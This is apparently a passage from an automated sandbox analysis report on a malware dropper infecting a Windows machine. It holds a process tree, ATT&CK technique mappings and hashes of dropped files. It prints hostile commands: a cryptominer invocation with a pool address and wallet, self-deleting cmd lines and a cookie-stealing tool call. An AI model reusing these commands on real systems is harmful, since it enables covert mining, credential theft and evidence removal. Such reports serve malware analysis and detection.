                                                                                              -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w16502 --cpu-max-threads-hint 50 -r 9999
                                                                                              4⤵
                                                                                              • Blocklisted process makes network request
                                                                                              PID:1144
                                                                                          • C:\Users\Admin\AppData\Roaming\DA5A.tmp.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\DA5A.tmp.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            PID:756
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                            3⤵
                                                                                              PID:4932
                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                ping 127.0.0.1
                                                                                                4⤵
                                                                                                • Runs ping.exe
                                                                                                PID:4828
                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks whether UAC is enabled
                                                                                            PID:5056
                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            PID:2296
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4752
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5028
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:3952
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:3132
                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                          1⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1304
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                            2⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Checks processor information in registry
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:2228
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                          1⤵
                                                                                          • Drops file in Windows directory
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:4536
                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          PID:4584
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5092
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          PID:4180
                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                            C:\Windows\system32\WerFault.exe -u -p 4180 -s 2248
                                                                                            2⤵
                                                                                            • Program crash
                                                                                            PID:6040
                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                            C:\Windows\system32\WerFault.exe -u -p 4180 -s 3420
                                                                                            2⤵
                                                                                            • Program crash
                                                                                            PID:3884
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:6092
                                                                                        • C:\Windows\system32\werfault.exe
                                                                                          werfault.exe /h /shared Global\9ff78088e54c4fcdab03c7b7519aa614 /t 3952 /p 5092
                                                                                          1⤵
                                                                                            PID:5124
                                                                                          • C:\Windows\system32\werfault.exe
                                                                                            werfault.exe /h /shared Global\bba87a3c9cca43b8ae30c64905375e05 /t 5752 /p 6092
                                                                                            1⤵
                                                                                              PID:5584
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:4408
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              PID:5648
                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                              1⤵
                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                              PID:5852
                                                                                            • C:\Users\Admin\AppData\Local\Temp\E5F7.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\E5F7.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              PID:6004
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\E5F7.exe"
                                                                                                2⤵
                                                                                                  PID:3512
                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                    timeout /T 10 /NOBREAK
                                                                                                    3⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:4760
                                                                                              • C:\Users\Admin\AppData\Local\Temp\32DF.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\32DF.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5556
                                                                                              • C:\Users\Admin\AppData\Local\Temp\34C5.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\34C5.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1084
                                                                                              • C:\Users\Admin\AppData\Local\Temp\3F84.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\3F84.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5984
                                                                                                • C:\Users\Admin\AppData\Roaming\RegWorkshop\RegWorkshop.exe
                                                                                                  C:\Users\Admin\AppData\Roaming\RegWorkshop\RegWorkshop.exe
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:2800
                                                                                              • C:\Users\Admin\AppData\Local\Temp\4551.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\4551.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:5900
                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                  2⤵
                                                                                                    PID:4516
                                                                                                • C:\Users\Admin\AppData\Local\Temp\4AC1.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\4AC1.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  PID:4768
                                                                                                • C:\Users\Admin\AppData\Local\Temp\4EAA.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\4EAA.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Modifies registry class
                                                                                                  PID:5048
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1171344888.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1171344888.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5164
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\397771211.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\397771211.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5796
                                                                                                • C:\Users\Admin\AppData\Local\Temp\51F7.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\51F7.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4792
                                                                                                • C:\Users\Admin\AppData\Local\Temp\56E9.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\56E9.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5676
                                                                                                • C:\Windows\system32\OpenWith.exe
                                                                                                  C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                  1⤵
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:4848
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:2740
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:4812
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:492
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe
                                                                                                        1⤵
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:5444
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:4276
                                                                                                        • C:\Windows\explorer.exe
                                                                                                          C:\Windows\explorer.exe
                                                                                                          1⤵
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:4704
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:5260
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe
                                                                                                            1⤵
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:5324
                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:5416
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                              1⤵
                                                                                                                PID:2740
                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                1⤵
                                                                                                                  PID:1920
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                  1⤵
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Modifies registry class
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:5316
                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                  PID:4680
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:5368
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                  • Modifies registry class
                                                                                                                  PID:4952
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                  • Modifies registry class
                                                                                                                  PID:4040
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                  • Modifies registry class
                                                                                                                  PID:1532
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                  • Modifies registry class
                                                                                                                  PID:5792

                                                                                                                Network

                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                Persistence

                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                1
                                                                                                                T1060

                                                                                                                BITS Jobs

                                                                                                                1
                                                                                                                T1197

                                                                                                                Defense Evasion

                                                                                                                Modify Registry

                                                                                                                3
                                                                                                                T1112

                                                                                                                BITS Jobs

                                                                                                                1
                                                                                                                T1197

                                                                                                                Install Root Certificate

                                                                                                                1
                                                                                                                T1130

                                                                                                                Credential Access

                                                                                                                Credentials in Files

                                                                                                                4
                                                                                                                T1081

                                                                                                                Discovery

                                                                                                                Software Discovery

                                                                                                                1
                                                                                                                T1518

                                                                                                                Query Registry

                                                                                                                4
                                                                                                                T1012

                                                                                                                System Information Discovery

                                                                                                                5
                                                                                                                T1082

                                                                                                                Security Software Discovery

                                                                                                                1
                                                                                                                T1063

                                                                                                                Peripheral Device Discovery

                                                                                                                1
                                                                                                                T1120

                                                                                                                Remote System Discovery

                                                                                                                1
                                                                                                                T1018

                                                                                                                Collection

                                                                                                                Data from Local System

                                                                                                                4
                                                                                                                T1005

                                                                                                                Command and Control

                                                                                                                Web Service

                                                                                                                1
                                                                                                                T1102

                                                                                                                Replay Monitor

                                                                                                                Loading Replay Monitor...

                                                                                                                Downloads

                                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                  MD5

                                                                                                                  7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                  SHA1

                                                                                                                  804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                  SHA256

                                                                                                                  bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                  SHA512

                                                                                                                  49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                  MD5

                                                                                                                  7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                  SHA1

                                                                                                                  804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                  SHA256

                                                                                                                  bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                  SHA512

                                                                                                                  49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                • C:\Program Files\VideoLAN\WQOXNPDEGK\ultramediaburner.exe
                                                                                                                  MD5

                                                                                                                  6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                  SHA1

                                                                                                                  938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                  SHA256

                                                                                                                  b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                  SHA512

                                                                                                                  a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                • C:\Program Files\VideoLAN\WQOXNPDEGK\ultramediaburner.exe
                                                                                                                  MD5

                                                                                                                  6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                  SHA1

                                                                                                                  938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                  SHA256

                                                                                                                  b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                  SHA512

                                                                                                                  a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                • C:\Program Files\install.dat
                                                                                                                  MD5

                                                                                                                  806c3221a013fec9530762750556c332

                                                                                                                  SHA1

                                                                                                                  36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                  SHA256

                                                                                                                  9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                  SHA512

                                                                                                                  56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                • C:\Program Files\install.dat
                                                                                                                  MD5

                                                                                                                  bef5c483c6eba257020201190666e28d

                                                                                                                  SHA1

                                                                                                                  e7f5cda41f731eea23bc45c0a6c06ad91f1d7df8

                                                                                                                  SHA256

                                                                                                                  d42b23175385ccc042ffebd37cc0f25847c790fb6f98bad0cd024f70f85b3fce

                                                                                                                  SHA512

                                                                                                                  302bca91e431e388f7bcff837ab6b7be23a9a38026410589e4ae3c86be057039117897429b5664eccee8a6871904f8e44629acf7d837cece8c701fb6915fdf90

                                                                                                                • C:\Program Files\install.dll
                                                                                                                  MD5

                                                                                                                  fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                  SHA1

                                                                                                                  6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                  SHA256

                                                                                                                  9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                  SHA512

                                                                                                                  0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                • C:\Program Files\install.dll
                                                                                                                  MD5

                                                                                                                  c6a2e4e23319dec9d56f8029ef834e83

                                                                                                                  SHA1

                                                                                                                  299e80473cbe56b596a2d4d38aea0aab46826167

                                                                                                                  SHA256

                                                                                                                  6ae4bd10f8bc7f3e5856c7f3571d165787f48d23f95ccfa823a5dab74f7fd554

                                                                                                                  SHA512

                                                                                                                  2a30529c2254ff481ab099032829d1b533d8bb6fca6a766d04e3febd6dc87ba34852eb7354ffc8d0ed7f584b5bff587e2b549c4f4c9150e98a2ff6a0f751438a

                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                  MD5

                                                                                                                  3dc75c8ba7dcdc712767df3611586f1b

                                                                                                                  SHA1

                                                                                                                  5533aa220568dcad942d24c661ca74b060738d31

                                                                                                                  SHA256

                                                                                                                  a646721e8d0f7dc26db96866769f2c510a578d881e1d39f89bd9fc747f05bc5d

                                                                                                                  SHA512

                                                                                                                  d639b5768098b1ed5380c3d2ba8dfddaecde5b23b620748edaac9f93ccbf8d91173c18d1baa54c460ebc10ebb90cd988372167a984cfae74a01767b025698067

                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                  MD5

                                                                                                                  24df47c0abca3f68afdcab7c519d7c39

                                                                                                                  SHA1

                                                                                                                  b175a5c0b829e4ae2a8ec10c0f07de9b17667eb9

                                                                                                                  SHA256

                                                                                                                  dbb2bc09bd21f4cde8453ebe73c8750c694ea9b4070d7bf4a42cbf14958088d0

                                                                                                                  SHA512

                                                                                                                  28ad5e8a6317c8dc16f2918289503cdb5f5cad18248d77f8aa180fcb3ff8ac582889941cc17ae95749d8f3629c87a867f4ae2d2da3af3c7034f252ae53581b6e

                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                  MD5

                                                                                                                  3a938ddb2b51a7fcec7e9dd966ff6841

                                                                                                                  SHA1

                                                                                                                  7c964747c52d251e71db404afc66c051c7abc04a

                                                                                                                  SHA256

                                                                                                                  ca993d963015dc2b957c21e340608ec435e3d01d8b2de3f068688182ef4c1fca

                                                                                                                  SHA512

                                                                                                                  2b4bf2468c5a59056edf56bafa4efbf2086bbc4feccbdcffff40b2a02a03146c7424ec0445df249c2b3e49b7365b96f79c06429de6bc09bccf9e2f44f2676818

                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                  MD5

                                                                                                                  ecbecc2158786bc314dcabcfd0e35e37

                                                                                                                  SHA1

                                                                                                                  32832c4c2bcdcf5bf1dbcabd03659fb16000a561

                                                                                                                  SHA256

                                                                                                                  d3e51766f24f475041b4b75931585d05029f9b4d38162da4fb363ad868622f75

                                                                                                                  SHA512

                                                                                                                  4aad60811c48739f7d61dee67ae3eafd844d1a9d732ee41f7557069f48490e5b33cb49189eaa477173ab19af35fe9fdac54fdb66ea5fc5844cff3bc5c8ee0576

                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                  MD5

                                                                                                                  2ce96024663dce2edbff8cce755e4cb8

                                                                                                                  SHA1

                                                                                                                  075f93e3701bb9d6e75e7534b3ade8eb09a7a1c7

                                                                                                                  SHA256

                                                                                                                  3e0437b186f2ca841f164cd3b92f364096f401caf28235eff3af07b923c7f330

                                                                                                                  SHA512

                                                                                                                  82fa1d7d2047e762b8cb900e28fcf48e3795e20c51f3d28f97919464559f1162580fe089e92786b0f9837cae35eeead9ebf62c26dadb83d468b96a94436bd300

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\25-36f40-f1c-d698c-b3b26b4a385e1\Kenessey.txt
                                                                                                                  MD5

                                                                                                                  97384261b8bbf966df16e5ad509922db

                                                                                                                  SHA1

                                                                                                                  2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                                  SHA256

                                                                                                                  9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                                  SHA512

                                                                                                                  b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\25-36f40-f1c-d698c-b3b26b4a385e1\Lyweletuzhae.exe
                                                                                                                  MD5

                                                                                                                  c1671cfbdbd5de53b60feb041f290a7d

                                                                                                                  SHA1

                                                                                                                  7d8c20bf34a7d970f98a2d339d022e2e143b5c58

                                                                                                                  SHA256

                                                                                                                  53637bf7daa6b5edf35a77767d903da429e0b9a3a6705194f137925f44c1522a

                                                                                                                  SHA512

                                                                                                                  751b869a9903939b6a3dd208b428656d694969fcf475bb0a28e1b9b2e7f22c0575b6b9b1b6ee5e661589812004d48c81e02fdaf8981440a59c1995cd0f3acceb

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\25-36f40-f1c-d698c-b3b26b4a385e1\Lyweletuzhae.exe
                                                                                                                  MD5

                                                                                                                  c1671cfbdbd5de53b60feb041f290a7d

                                                                                                                  SHA1

                                                                                                                  7d8c20bf34a7d970f98a2d339d022e2e143b5c58

                                                                                                                  SHA256

                                                                                                                  53637bf7daa6b5edf35a77767d903da429e0b9a3a6705194f137925f44c1522a

                                                                                                                  SHA512

                                                                                                                  751b869a9903939b6a3dd208b428656d694969fcf475bb0a28e1b9b2e7f22c0575b6b9b1b6ee5e661589812004d48c81e02fdaf8981440a59c1995cd0f3acceb

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\25-36f40-f1c-d698c-b3b26b4a385e1\Lyweletuzhae.exe.config
                                                                                                                  MD5

                                                                                                                  98d2687aec923f98c37f7cda8de0eb19

                                                                                                                  SHA1

                                                                                                                  f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                  SHA256

                                                                                                                  8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                  SHA512

                                                                                                                  95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\30t4x1lb.cdt\instEU.exe
                                                                                                                  MD5

                                                                                                                  bdb62dc3502ea91f26181fa451bd0878

                                                                                                                  SHA1

                                                                                                                  bff5609cd44209ee1f07920b2103757792866d7a

                                                                                                                  SHA256

                                                                                                                  6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                                                                  SHA512

                                                                                                                  12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\30t4x1lb.cdt\instEU.exe
                                                                                                                  MD5

                                                                                                                  bdb62dc3502ea91f26181fa451bd0878

                                                                                                                  SHA1

                                                                                                                  bff5609cd44209ee1f07920b2103757792866d7a

                                                                                                                  SHA256

                                                                                                                  6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                                                                  SHA512

                                                                                                                  12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5smx3q4y.muz\google-game.exe
                                                                                                                  MD5

                                                                                                                  11e8d91d2ebe3a33754883c3371bafdf

                                                                                                                  SHA1

